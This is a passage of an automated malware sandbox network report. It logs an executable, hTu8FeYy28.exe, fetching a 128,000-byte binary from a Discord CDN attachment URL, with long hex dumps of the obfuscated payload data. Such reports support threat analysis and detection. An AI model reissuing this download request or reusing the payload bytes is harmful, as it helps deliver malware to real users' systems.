                    2021-10-08 15:51:51 UTC13INData Raw: 66 99 9e 38 7c d3 6e eb 14 d3 6a bc f7 bf 39 bf 6c b7 8e 3f ff 87 f0 2b 9d 90 5c 8f e3 57 6e b4 50 aa 75 6f 2c 54 a4 20 65 1f ec 8a 21 bf 33 eb 02 fa 3c 79 4d 90 06 ff d3 3c 71 7d 03 31 c5 6f 74 fe 04 b5 d5 76 ce c9 05 2f 86 71 2f 90 0c c9 19 fd dd 72 a8 2d 95 d0 cd 03 66 99 9e 38 7c d3 6e eb 14 d3 6a bc f7 bf 39 bf 6c b7 8e 3f ff 87 f0 2b 9d 90 5c 8f e3 57 6e b4 50 aa 75 6f 2c 54 a4 20 65 1f ec 8a 21 bf 33 eb 02 fa 3c 79 4d 90 06 ff d3 3c 39 9e 13 20 74 b8 d2 ec 92 77 54 bf 49 a2 12 a4 7f 23 ca f9 f3 ab d1 0c 94 7b 02 9a 1d a1 ad 89 db 0c b5 a0 72 e5 59 29 97 87 b5 be cf 7e cf 70 eb 41 a7 9f fa 57 5e e0 dc ef b7 cd 0f 2b e4 ac 23 a6 2e 5b 70 81 2f d0 de 89 dc b8 d2 8f ad be d9 16 af c5 4b a9 8e 74 f9 ac 53 7b 3f b2 22 32 14 91 cd 67 65 6f 09 64 f6 5e e0
                    Data Ascii: f8|nj9l?+\WnPuo,T e!3<yM<q}1otv/q/r-f8|nj9l?+\WnPuo,T e!3<yM<9 twTI#{rY)~pAW^+#.[p/KtS{?"2geod^
                    2021-10-08 15:51:51 UTC14INData Raw: 56 f8 1a 6d 4c 3a 51 1a 04 bc 8a 74 dc bb 07 3f dd 3f dd 79 68 ae 68 a5 d2 cf 37 a5 d2 9f c4 e4 ea 96 2e 55 12 9c 3d f8 1a 6b 47 9f c4 c9 29 bb 07 33 c0 fe 28 47 f0 69 42 01 48 1f 90 49 f5 f5 93 87 8a 75 5f 43 e6 83 80 98 33 b6 7b 03 4c 35 c5 0f 69 26 21 fb a1 bc 8a 7e f4 76 e1 43 e6 9b ba ea f8 74 dc f7 98 56 94 45 eb 12 f1 cf 37 c4 9d db 54 aa 5e 87 8a 63 33 af ea 8a 11 1c 09 3e 5a be 8e 54 8f b2 72 91 a2 47 f0 7e f4 62 b1 80 f9 f1 89 ea f8 77 64 96 2e 52 8b fb a1 e9 76 95 ac 16 fa 50 86 05 51 6d 4c 09 5b 4c 7c 91 a2 3d d8 ed 80 8b 94 4c 7c 97 b1 8a 11 1a 04 a1 c9 40 5f 0a dd 3d d8 a4 50 ea f8 7b 6d 3a 51 28 26 40 5f 0a dd 2d b2 1d 8b fa 1f b0 6d 3f dd 30 39 ee 02 ed 80 8a 11 4b fa 38 4c 5d 25 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41
                    Data Ascii: VmL:Qt??yhh7.U=kG)3(GiBHIu_C3{L5i&!~vCtVE7T^c3>ZTrG~bwd.RvPQmL[L|=L|@_=P{m:Q(&@_-m?09K8L]%Al)ZAl)ZA
                    2021-10-08 15:51:51 UTC16INData Raw: 32 3e 2f b6 08 d9 6f 50 f2 0c 8d 99 db 54 af ea 96 2e 5b 20 7b 6d 38 4c 1d 8b e6 ef e1 63 43 e6 a0 46 79 68 a5 d2 cf 37 b3 f4 64 b6 5b 20 66 bb 69 42 05 51 61 2f c4 9d de db 22 17 5d 25 fa 1f f9 9c 51 08 b8 80 8f 9d d1 3c 1f 90 34 42 10 ec 93 a7 b2 72 b5 f9 e9 76 86 08 ab e1 02 ca 8b 94 4d ff c2 98 5f 2a 4b fa 69 42 0a dd 10 ec ed 80 8e 1b e9 76 8d 99 d3 41 90 20 77 64 c0 93 c8 a7 f7 98 47 f0 69 42 05 51 61 2f c4 9d de db 02 ca bb 07 7f 77 17 7d 57 17 55 12 d1 3c 33 c0 e3 67 44 69 36 47 d0 ba ea f8 6e ce db 54 e6 ef a4 50 af ea 8b 94 0c e2 cd 33 e0 e0 85 85 f5 93 de db 20 12 d1 3c 30 39 a1 c9 09 5b 54 8f f3 8e 7a eb 12 f1 fb a1 a8 5a e8 f4 30 39 a9 dc b9 02 a3 cd 47 f0 75 5f 4f 03 3a 51 66 bb 68 c0 f0 07 76 e1 06 d4 af ea 91 a2 23 99 c2 98 13 73 2d b2 1d
                    Data Ascii: 2>/oPT.[ {m8LcCFyh7d[ fiBQa/"]%Q<4BrvM_*KiBvA wdGiBQa/w}WU<3gDi6GnTP3 <09[TzZ09Gu_O:Qfhv#s-
                    2021-10-08 15:51:51 UTC17INData Raw: 09 3a 51 7d 72 b6 7b 0c e2 af ea ff ab 82 fe 4d ff ef 84 00 c5 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 74 dc a2 4b 96 2e 55 12 87 8a 31 bb 7e f4 64 b6 09 5b 45 eb 0b 60 c3 1a 76 e1 13 73 7a eb 1f 90 49 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f4 10 9f c4 b8 80 d9 4f 2d b2 50 86 7b 6d 69 42 46 6e ee 02 af ea 94 29 c1 16 9c 3d f8 1a 6a c4 f8 1a 74 dc b8 80 d9 4f 77 64 d9 4f 6d 4c 12 f1 e8 f4 53 0d 7c f0 74 dc f2 0c c2 98 1d 8b b6 7b 1e 0d 40 5f 08 d9 6f 50 e3 67 51 08 b0 6d 2a 2a 0a dd 3c 56 e0 e0 81 7c 95 ac 11 6e ad e6 cf 37 be 8e 74 dc b9 02 a4 50 e7 71 16 fa 04 cf 44 69 27 a3 b9 02 ab e1 00 c5 76 e1 0f 69 32 3e 2f b6 1f 90 00 c5 68 c0 fc 24 70 d3 2d b2 13 73 7a eb 0f 69 2d b2 1c 09 7b 6d 3f dd 3c 56
                    Data Ascii: :Q}r{M n=3K tK.U1~d[E`vszItAO-P{miBFn)=jtOwdOmLS|t{@_oPgQm**<V|n7tPqDi'vi2>/h$p-szi-{m?<V
                    2021-10-08 15:51:51 UTC18INData Raw: dc d5 66 bb 07 56 97 b1 ef 84 07 56 94 29 a8 5a 9e 41 e2 65 38 4d df 5e a7 c7 24 9c 3d d9 47 f0 07 59 e4 6a c4 9d 4f 03 4c 73 a4 d0 ba 85 5d 25 9e 4e 7c 70 d3 41 22 17 7d 7d 8e 9b ba 85 2d b2 72 d7 b0 ed 80 f9 0c e2 e5 63 c9 29 af ea f8 1a 04 cf 33 c0 93 a7 d7 4b fa 1f 90 a0 46 6e a6 55 12 f1 83 00 c5 1f b0 6d 4c 7c f6 15 7a eb 7b 6d 4c 7c f4 10 ec fd a6 55 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5
                    Data Ascii: fVV)ZAe8M^$=GYjOLs]%N|pA"}}-rc)3KFnUmL|z{mL|Un=3K n=3K n=3K n=3K n=3K n
                    2021-10-08 15:51:51 UTC20INData Raw: 2a 58 99 da d2 cd 33 b2 72 bd 0c c2 98 58 99 d6 c8 c2 98 5b 20 71 55 32 3e 3f dd 3e 5a f0 07 37 ca f9 9c 2c 2f d9 4f 71 55 77 64 cc b0 4d ff d2 bf 73 5a be 8e 75 5f 45 eb 12 f1 fa 1f f9 9c 4b fa 76 e1 27 a3 dd 59 6f 50 f3 8e 6b 47 9e 41 8b 94 09 5b 43 e6 86 08 ab e1 06 d4 ae 68 b5 f9 f2 0c c2 98 57 17 14 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f7 98 5f 2a 46 6e bb 07 30 39 ee 02 a1 c9 5a 9e 28 26 65 38 45 eb 1e 0d 09 5b 49 f5 f5 93 87 8a 77 64 d9 4f 23 99 d1 3c 38 4c 19 81 5c a3 a9 dc b9 02 a5 d2 c6 a2 2e 34 20 12 d1 3c 32 3e 3b d3 24 1c 5b 20 05 51 6c c9 4c 7c 99 b5 97 b1 8a 11 0a dd 79 68 b3 f4 63 33 a5 d2 dc d7 28 26 40 5f 0a dd 3c 56 f8 1a 6d 4c 3a 51 1a 04 bc 8a 74 dc bb 07 3f dd 3f dd 79 68 ae 68 a5 d2 cf 37 a5 d2 9f c4 e4 ea 96 2e 55 12 9c 3d f8 1a 6b 47
                    Data Ascii: *X3rX[ qU2>?>Z7,/OqUwdMsZu_EKv'YoPkGA[ChWtA_*Fn09Z(&e8E[IwdO#<8L\.4 <2>;$[ QlL|yhc3(&@_<VmL:Qt??yhh7.U=kG
                    2021-10-08 15:51:51 UTC21INData Raw: 5a 9e 61 2f d8 cd 5c a3 a4 50 f2 0c 92 25 fb a1 aa 5e df 5e e2 e5 70 d3 25 9e 24 1c 7d 72 aa 5e c8 a7 a7 d7 3b d3 34 42 17 7d 52 8b e0 e0 8f 9d d1 3c 76 e1 06 d4 a0 46 0f 69 24 1c 7b 6d 29 a8 2e 34 2c 2f ff ab f6 15 1c 09 3e 5a f2 0c 8b 94 48 73 3c 56 b4 76 8f 9d d0 ba ec fd d2 bf 63 33 a5 d2 cc b0 1e 0d 24 1c 19 81 04 cf 12 f1 a9 dc b9 02 a5 d2 d6 c8 d3 41 92 25 fb a1 aa 5e df 5e c2 98 13 73 36 47 91 a2 25 9e 33 c0 f6 15 0c e2 9d bf 54 8f 88 0d 17 7d 1d 8b e6 ef f6 15 1d 8b b4 76 95 ac 0d 65 59 1b ef 84 71 55 73 5a e8 f4 30 39 aa 5e c2 98 47 f0 64 b6 1e 0d 15 78 9e 41 87 8a 7f 77 31 bb 1f 90 44 69 27 a3 b9 02 b8 80 96 2e 44 69 32 3e 2f b6 08 d9 6f 50 f2 0c 8d 99 db 54 af ea 96 2e 5b 20 7b 6d 38 4c 1d 8b e6 ef e1 63 43 e6 a0 46 79 68 a5 d2 cf 37 b3 f4 64
                    Data Ascii: Za/\P%^^p%$}r^;4B}R<vFi${m).4,/>ZHs<Vvc3$A%^^s6G%3T}veYqUsZ09^GdxAw1Di'.Di2>/oPT.[ {m8LcCFyh7d
                    2021-10-08 15:51:51 UTC22INData Raw: 56 94 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 29 a8 5a 9e 41 e2 e5 6c c9 4c 7c 85 85 d1 3c 55 12 9f c4 f2 0c af ea fb a1 a7 d7 3e 5a cd 33 c3 1a 76 e1 06 d4 a1 c9 44 69 27 a3 ae 68 a5 d2 fb a1 c1 16 88 0d 00 c5 7d 72 b5 f9 f9 9c 4b fa 70 d3 0f 69 4a 77 16 fa 7a eb 19 81 13 73 2e 34 21 95 e3 67 3a 51 7a eb 1e 0d 07 56 f9 9c 58 99 c1 16 8a 11 0b 60 ff ab e8 f4 64 b6 08 d9 3a 51 6f 50 f3 8e 5a 9e 47 f0 7e f4 7c f0 72 d8 87 8a 15 78 83 80 97 b1 9a 38 06 d4 c7 24 65 38 2d b2 3f dd 5a 9e 2d b2 1b 86 7a eb 0b 60 ed 80 fc 24 74 dc b4 76 93 a7 b6 7b 20 12 f4 10 95 ac 11 6e af ea 8d 99 c7 24 7e f4 75 5f 6c c9 21 95 d5 46 1c 09 3a 51 7d 72 b6 7b 0c e2 af ea ff ab 82 fe 4d ff ef 84 00 c5 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7
                    Data Ascii: V)ZAl)ZAl)ZAlL|<U>Z3vDi'h}rKpiJwzs.4!g:QzVX`d:QoPZG~|rx8$e8-?Z-z`$tv{ n$~u_l!F:Q}r{M n=3
                    2021-10-08 15:51:51 UTC24INData Raw: 3d d9 ff ab e1 63 33 c0 92 25 9e 41 e2 e5 6c 9a 04 ef dd 59 1b 86 08 d9 4f 02 6a c4 9d bf 11 6e cf 37 ca ab e1 63 33 93 9b 9a 61 2f b6 7b 6d 4c 7c f1 19 81 7c f0 07 56 95 ac 63 33 c0 93 a7 84 3f fd ff ab e1 63 33 c0 93 a6 d5 46 6e ce b5 f9 9d bf 11 6e ce b5 f9 cf 0b 40 06 d4 c3 1a 04 cf 37 cb 5e a7 d7 4b fa 1f 91 a2 4b fa 1f 90 20 41 de fb f8 1a 04 cf 37 ca ab e0 80 f9 9c 3d d8 cd 32 3e 5a 9e 41 e2 e5 3f e1 43 bf 11 6e ce b5 79 68 c1 5e 27 a3 cc 4e 01 48 72 e8 74 dc d6 38 4c 7c f0 05 51 08 d9 4f 50 ba a5 8b 94 29 a8 5a 1e 0d 64 ae 68 c0 83 80 79 68 c1 16 fa 1f 9f 3b 53 0d 65 d0 ba 85 8a ef 04 cf 37 1a 04 cf 38 b1 6f 50 86 b0 6d 4c 73 a6 d5 46 6e 6e ce b5 f6 ee 82 fe 28 ae 68 c0 9c c7 24 1b 86 08 d9 4f 03 4c 2f 8a 31 e2 e5 6c c9 29 28 26 21 fd a6 55 12 fb
                    Data Ascii: =c3%AlYOjn7c3a/{mL||Vc3?c3Fnn@7^KK A7=2>ZA?Cnyh^'NHrt8L|QOP)Zdhyh;Se78oPmLsFnn(h$OL/1l)(&!U
                    2021-10-08 15:51:51 UTC25INData Raw: c7 11 5c 8a 23 87 b8 92 17 7c c1 e4 db b1 de 00 f4 d4 f2 a4 61 8c 27 3e 6b df 6f c2 a9 51 39 ae 59 41 d3 14 c4 b9 33 de ea e1 53 f1 b9 de eb d3 71 ce 85 16 ca 25 ae 15 48 0b 50 e8 c4 c7 14 a0 76 aa 6e 88 3d e1 53 3e 6a e2 d5 66 8b 87 ba 88 3d d8 cd 33 c1 5e a7 d6 a8 5a 9e 41 dd a3 f2 e1 5c 44 56 4e be 5a a1 0e d8 0c dd ed bf bf 2e 95 93 3c 69 cc 8f 15 47 8e 24 64 89 e4 d5 1d b4 3b ec bd 33 f3 b1 c9 16 e3 58 97 8e 1a 3a bd 32 d6 f6 f1 b7 1e 33 18 c1 c6 9c f1 b7 36 79 ac 5d e5 52 37 f4 a8 64 02 f4 a0 78 4a 49 5d 1b 22 29 08 e7 ed be 16 c4 09 65 a8 64 3a 6f d8 f3 0a e3 e7 4f 7f 49 8d a7 a3 f3 fe 16 96 10 84 3d bc b4 16 c4 c1 28 7e ca ff 95 fc 1a 48 4d b7 c0 d7 75 1f ae 54 b1 d7 75 79 56 80 c7 2d 8f 62 8c e2 d8 27 9e a1 f4 c6 9f 0f 54 cc 8d aa 63 27 9f 3b ef
                    Data Ascii: \#|a'>koQ9YA3Sq%HPvn=S>jf=3^ZA\DVNZ.<iG$d;3X:236y]R7dxJI]")ed:oOI=(~HMuTuyV-b'Tc';
                    2021-10-08 15:51:51 UTC26INData Raw: a7 ea 40 62 1d b6 f2 31 cf 0a bc b7 a3 f0 4b c7 1e 30 0f 54 a3 f0 2f 8b b0 50 a6 68 dc ea e0 dd 4d c2 88 30 35 f8 12 cc b4 4b fa 23 61 13 87 b6 93 9b 62 8d 51 34 86 34 82 c2 24 20 aa 62 05 6d fc 18 53 31 13 4f a3 f1 09 67 49 c9 59 27 cf 0b 08 e5 08 e5 0c de 87 b6 23 a5 86 34 12 cd 7f 4b b2 4e c5 23 a5 ee 1e 31 bf 2d b2 49 09 60 54 b4 82 c5 ef bf fd 9d 57 2c cb 15 a4 6b fb 9a 94 12 59 20 b6 40 ff 90 bc b1 77 5f be b5 69 79 e4 d1 b8 bb 63 08 8d a2 1b bd 40 64 fe 13 37 f1 c9 12 cd 08 e1 58 ad dd 75 64 ba bf ed ba 7d 48 87 b0 9d 85 69 78 0e dd bd 36 a7 ed 5c 99 61 15 cc 8a b5 c3 ba bf 8d a3 55 28 b2 48 e3 5d a9 e6 67 07 d2 85 f9 a6 09 61 63 09 13 49 b1 d5 06 ee 3e 60 94 13 47 ca 9b 80 d5 7c d4 f9 98 0a 2d 8b 78 df b6 42 80 c0 73 63 ef bd d4 fa cb 17 ad df 96
                    Data Ascii: @b1K0T/PhM05K#abQ44$ bmS1OgIY'#4KN#1-I`TW,kY @w_iyc@d7Xud}Hix6\aU(H]gacI>`G|-xBsc
                    2021-10-08 15:51:51 UTC28INData Raw: 04 19 b9 af d2 1f a8 30 01 09 63 07 61 d1 0b fa 28 b4 41 68 f7 1a 33 ba b2 1a 33 9b 8d d6 ff e9 41 d2 88 2e 03 5b 16 0f 5f c6 94 1f a5 d0 8e ee 36 86 3b 74 ee 1a 36 44 58 2a 1b 18 ce ea c9 67 0c c0 a2 4f 33 1a 34 86 38 fa 2f 18 cf af da 40 6f d0 8a 62 81 1b b6 39 ce b5 f8 32 3e 5a 4e 81 42 68 fc 97 8d cf 0b 2e 08 e5 50 a9 e0 c3 21 42 5f 9b 81 d0 81 d8 f6 8c 2d 3d e3 e0 db 2f 8d fd 9d ed bb 4f 38 72 e3 53 36 6d 77 44 52 9d 84 0f 52 89 b5 01 72 36 7d 91 98 ea c2 56 ae ac 59 a2 71 fa 25 3a 6b dd 63 bc b0 e8 ce ca 91 d7 71 3a 6b 22 2d e9 4c 2c 15 3e 60 97 8b a5 e8 d2 85 97 8b 93 9e ba bc 66 82 16 c3 fa 26 fd 9f 10 d5 96 17 b5 c0 57 2e 88 34 fa 26 91 9b 16 c3 be b7 5e 9e d9 76 75 66 37 f3 06 ed 00 fc 58 a0 32 07 26 18 97 88 69 7b 31 82 a6 6c 99 8c 5a a7 93 9e
                    Data Ascii: 0ca(Ah33A.[_6;t6DX*gO348/@ob92>ZNBh.P!B_-=/O8rS6mwDRRr6}VYq%:kcq:k"-L,>`f&W.4&^vuf7X2&i{1lZ
                    2021-10-08 15:51:51 UTC29INData Raw: 26 14 fd 92 d5 72 34 76 09 6f b4 42 84 37 16 ce 6d 78 32 0a 0d 51 c0 a7 7f 43 7e c0 07 62 21 a1 45 df d6 fc a0 72 58 ad 9a 0c 9a 0c 92 11 3e 6e f2 38 74 e8 c0 a7 e7 45 c7 10 c4 a9 f8 2e 14 c1 0a e9 62 82 0a ee e2 d6 14 c6 7a d8 19 b2 a2 78 2a 19 49 c6 66 88 cd 00 7d 41 7a d8 4d cc cc 83 f8 29 dc e4 9a 0b 0c d1 54 bc ee 31 db 67 65 0b 58 aa 7a d8 ed b3 e8 c7 3c 65 2c 1c 19 b2 7e c7 2c 1c 0d 57 eb 49 29 9a f4 22 df 6c 0d 57 d7 79 d4 f1 31 89 3b e1 d3 73 f6 27 07 64 32 0c 92 17 11 5c cb 1c 6d 7e 94 1b da e0 b8 b2 26 13 23 ab a9 ee 2a 18 e7 43 f2 3e 4a 45 e7 43 ee 30 3d ea f8 2b 51 39 36 76 11 5f fa 2e 8c 27 17 4c cc 81 d0 8b 3c 67 99 84 a3 fc b8 b1 77 55 82 cf 47 c1 4a 46 36 76 b5 c8 f7 a9 90 11 26 10 a8 6b 07 67 01 79 5c 92 31 8a 11 5e 5b 10 14 c5 eb 4b 0a
                    Data Ascii: &r4voB7mx2QC~b!ErX>n8tE.bzx*If}AzM)T1geXz<e,~,WI)"lWy1;s'd2\m~&#*C>JEC0=+Q96v_.'L<gwUGJF6v&kgy\1^[K
                    2021-10-08 15:51:51 UTC30INData Raw: 23 fa 27 ee 3a 7e cc a9 e4 e3 50 4c 49 74 e9 03 79 0c d7 07 63 03 79 77 51 0f 5a 34 71 21 a6 71 66 a3 fe 2f 85 85 b7 6a f6 9c 0f 68 f1 27 92 2b 9d 60 9c e5 5c 2b 9d c9 19 a7 d7 4b fa 9f c4 9d 8f 9d 80 0a e2 3b ec f3 b1 e8 cb 2e 0a 0a e0 07 6b 99 88 a3 f0 a6 6f 98 09 f3 b4 ed ba 03 76 94 13 2f 8c 55 28 3d e1 93 9e 86 31 04 f6 ac 5a c6 9b ea c1 52 b2 54 b7 06 ec c8 9f ef bc ae 50 98 0b 78 de cb 16 f0 3f d9 78 1a 33 34 75 d4 f4 95 9b c2 af 98 04 a3 fa 7b 5b d9 79 99 83 6b 71 8e 2d 04 f9 1e 3b 9c 0b 29 9e 02 fc 1f a6 5e 92 c9 1c c5 2a 96 1b 2b 98 bf 24 98 06 ac 56 f4 25 d0 8f d5 73 78 d3 5b 15 6c fd 50 b2 9f f0 d3 75 94 1d 4d cb 91 96 98 07 e6 db fc 10 74 e8 7b 59 57 23 a7 e3 6f 63 e6 dc 1a 37 0b 53 96 1d 0a ee 7a d8 db 67 30 0b 92 17 95 9e 21 a7 8c 24 4a 45
                    Data Ascii: #':~PLItycywQZ4q!qf/jh'+`\+K;.kov/U(=1ZRTPx?x34u{[ykq-;)^*+$V%sx[lPuMt{YW#oc7Szg0!$JE
                    2021-10-08 15:51:51 UTC32INData Raw: 28 26 21 95 ac 22 72 bf 70 a0 35 a0 0b 14 94 44 1b e9 30 39 ce b5 f9 cc f3 cf 43 83 c7 24 1c 09 34 24 72 91 f2 4f 77 01 0f 69 42 64 b6 1f d9 2b cc d5 34 2a 7e 80 97 d4 b1 9d ca e8 80 9c 7a eb 7b 6d 4c 3d ac 02 a7 a5 bd 4a 12 85 e4 ae 1c 6c 8e 1b 86 08 98 56 f7 f9 ec ae 0d 00 b7 b8 eb 08 b0 29 dc b2 35 c5 1f 90 44 08 bc f8 72 8c 73 3e 35 86 7c 99 cd 76 95 c9 6e ce b5 f9 9c 7c 83 e5 18 8a 73 33 b2 06 a0 07 33 ac 0a 9b ce d0 fd a6 55 12 f1 c8 c2 f5 f2 42 0c 96 4f 53 61 43 93 e1 17 18 b8 80 f9 9c 3d aa 31 c9 5b 65 4c 0f 08 95 d8 a8 1d 8b 94 29 a8 3f b0 04 9b d6 a9 bf 7e b8 f4 75 18 ff ab e1 63 72 b7 98 5d 6c ac 0f 08 ba ea b4 02 af ad e6 ef 84 03 0d 00 a8 3b 9d da be e7 37 af 86 7d 16 95 e1 17 18 b8 80 f9 9c 3d 99 d0 d6 ac 0d 04 87 ef e8 81 18 90 6d 38 29 ef
                    Data Ascii: (&!"rp5D09C$4$rOwiBd+4*~z{mL=JlV)5Drs>5|vn|s33UBOSaC=1[eL)?~ucr]l;7}=m8)
                    2021-10-08 15:51:51 UTC33INData Raw: b3 98 47 a2 4b fa 1f 90 45 87 e3 21 f3 c1 72 b6 3e 2e 51 5b 20 12 f1 89 fd c3 6e a0 2f d9 1f f5 ff c2 de af 8f ce b5 f9 9c 3d aa 3b a7 bb 6e 88 63 5c ca df 2e 51 6b 3f 98 57 72 b4 12 9f a5 ba eb 2e 34 42 64 d3 2d db 12 94 5d 4c 0e b0 6d 4c 7c 83 f3 eb 18 90 52 db 20 7b 15 3d d8 cd 33 a5 a1 a6 39 8d fd c8 ce f3 8e 1b 86 08 98 56 f8 73 1c 7d 01 3a 38 0a b9 6c a0 00 c5 1f 90 59 69 23 eb 19 e8 b8 e5 09 29 ee 02 ca ab a0 23 f7 f1 c5 7b 03 2d df 33 af a9 a8 3f 9a 38 4c 7c f0 75 30 4b 88 48 07 25 ff e7 05 34 05 51 08 d9 4f 42 0b 06 ba cc d5 2a 4b 99 da 9e 35 a0 01 48 73 5a 9e 00 a0 2b cc fe 4d 93 ce f3 eb 17 08 bd 63 7e 80 9c 7a eb 7b 6d 4c 3d bd 60 c8 c9 48 3b b6 17 08 bd 63 7e 80 9c 7a eb 7b 6d 4c 0f 1a 61 5d 41 86 49 96 41 90 70 a7 b2 35 c5 1f 90 61 40 39 a0
                    Data Ascii: GKE!r>.Q[ n/=;nc\.Qk?Wr.4Bd-]LmL|R {=39Vs}:8lYi#)#{-3?8L|u0KH%4QOB*K5HsZ+Mc~z{mL=`H;c~z{mLa]AIAp5a@9


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                    1 | 192.168.2.3 | 49822 | 162.159.130.233 | 443 | C:\Users\user\Desktop\hTu8FeYy28.exe
                    Timestamp | kBytes transferred | Direction | Data
                    2021-10-08 15:51:51 UTC | 34 | OUT | GET /attachments/895973838674862135/895974928933875752/Lnouxqkbbgkvxwmwtigvjxpvnenadlc HTTP/1.1
                    User-Agent: aswe
                    Host: cdn.discordapp.com
                    Cache-Control: no-cache
                    2021-10-08 15:51:51 UTC | 35 | IN | HTTP/1.1 200 OK
                    Date: Fri, 08 Oct 2021 15:51:51 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 128000
                    Connection: close
                    CF-Ray: 69b088711ba15b44-FRA
                    Accept-Ranges: bytes
                    Age: 17634
                    Cache-Control: public, max-age=31536000
                    Content-Disposition: attachment;%20filename=Lnouxqkbbgkvxwmwtigvjxpvnenadlc
                    ETag: "f82884cc5e7cf22e9702adbfc1f12bee"
                    Expires: Sat, 08 Oct 2022 15:51:51 GMT
                    Last-Modified: Fri, 08 Oct 2021 10:04:29 GMT
                    Vary: Accept-Encoding
                    CF-Cache-Status: HIT
                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                    x-goog-generation: 1633687469505069
                    x-goog-hash: crc32c=JdV9Ug==
                    x-goog-hash: md5=+CiEzF588i6XAq2/wfEr7g==
                    x-goog-metageneration: 1
                    x-goog-storage-class: STANDARD
                    x-goog-stored-content-encoding: identity
                    x-goog-stored-content-length: 128000
                    X-GUploader-UploadID: ADPycds0RnBpdJc_kVb2ENhqI_yORFMxXLMJ15oMSy2oDomj2hdfbHrpnzEnkEQU2Z1XjrrhjyYlI7T2bH5p-XkQ2X4
                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                    2021-10-08 15:51:51 UTC | 36 | IN | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mcL0VtIxJG%2FZn6Enuo1WCJAGn%2F8IfxHF5SIzzwDqC3HsRKPOcKMmDZtmGzZVwbaOA42Cx1g966WEc%2Bk3DwjQXtnJ%2B8%2BHpADIRdWd5COiraiBx%2FovWD%2FX53NZEQfkYgziOsneYA%3D%3D"}],"group":"cf-nel","m
                    2021-10-08 15:51:51 UTC52INData Raw: 16 fa 7a eb 19 81 13 73 2e 34 21 95 e3 67 3a 51 7a eb 1e 0d 07 56 f9 9c 58 99 c1 16 8a 11 0b 60 ff ab e8 f4 64 b6 08 d9 3a 51 6f 50 f3 8e 5a 9e 47 f0 7e f4 7c f0 72 d8 87 8a 15 78 83 80 97 b1 9a 38 06 d4 c7 24 65 38 2d b2 3f dd 5a 9e 2d b2 1b 86 7a eb 0b 60 ed 80 fc 24 74 dc b4 76 93 a7 b6 7b 20 12 f4 10 95 ac 11 6e af ea 8d 99 c7 24 7e f4 75 5f 6c c9 21 95 d5 46 1c 09 3a 51 7d 72 b6 7b 0c e2 af ea ff ab 82 fe 4d ff ef 84 00 c5 1f 90 20 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c 3d d8 cd 33 c0 93 a7 d7 4b fa 1f 90 20 12 f1 89 8f 9d bf 74 dc a2 4b 96 2e 55 12 87 8a 31 bb 7e f4 64 b6 09 5b 45 eb 0b 60 c3 1a 76 e1 13 73 7a eb 1f 90 49 f5 ff ab 80 f9 ea f8 74 dc 9e 41 f4 10 9f c4 b8 80 d9 4f 2d b2 50 86 7b 6d 69 42 46 6e ee 02 af ea 94 29 c1 16 9c 3d f8 1a 6a c4 f8
                    Data Ascii: zs.4!g:QzVX`d:QoPZG~|rx8$e8-?Z-z`$tv{ n$~u_l!F:Q}r{M n=3K tK.U1~d[E`vszItAO-P{miBFn)=j
                    2021-10-08 15:51:51 UTC53INData Raw: a7 d7 4b fa 1f 90 20 12 f0 b7 fe 28 26 21 95 ad e6 ef 84 03 4c 78 e6 ef 84 03 4c 7c f0 07 56 94 28 86 08 d9 4f 03 4c 7d 72 d8 cd 33 c0 97 b1 ef 84 03 4c 7c f0 07 56 94 28 b6 7b 6d 4c 7c f0 06 d4 c3 1a 04 cf 33 c0 93 a7 d7 4b fa 1f 90 20 12 f0 87 8a 11 6e ce b5 f8 1a 04 cf 37 ca af ea f8 1a 04 cf 37 ca ab 61 2f b7 96 ae 68 c2 de 5b 20 13 23 19 81 7e da 52 8b 95 94 a9 dc d5 66 bb 07 56 97 b1 ef 84 07 56 94 29 a8 5a 9e 41 e2 65 38 4d df 5e a7 c7 24 9c 3d d9 47 f0 07 59 e4 6a c4 9d 4f 03 4c 73 a4 d0 ba 85 5d 25 9e 4e 7c 70 d3 41 22 17 7d 7d 8e 9b ba 85 2d b2 72 d7 b0 ed 80 f9 0c e2 e5 63 c9 29 af ea f8 1a 04 cf 33 c0 93 a7 d7 4b fa 1f 90 a0 46 6e a6 55 12 f1 83 00 c5 1f b0 6d 4c 7c f6 15 7a eb 7b 6d 4c 7c f4 10 ec fd a6 55 12 f1 89 8f 9d bf 11 6e ce b5 f9 9c
                    Data Ascii: K (&!LxL|V(OL}r3L|V({mL|3K n77a/h[ #~RfVV)ZAe8M^$=GYjOLs]%N|pA"}}-rc)3KFnUmL|z{mL|Un
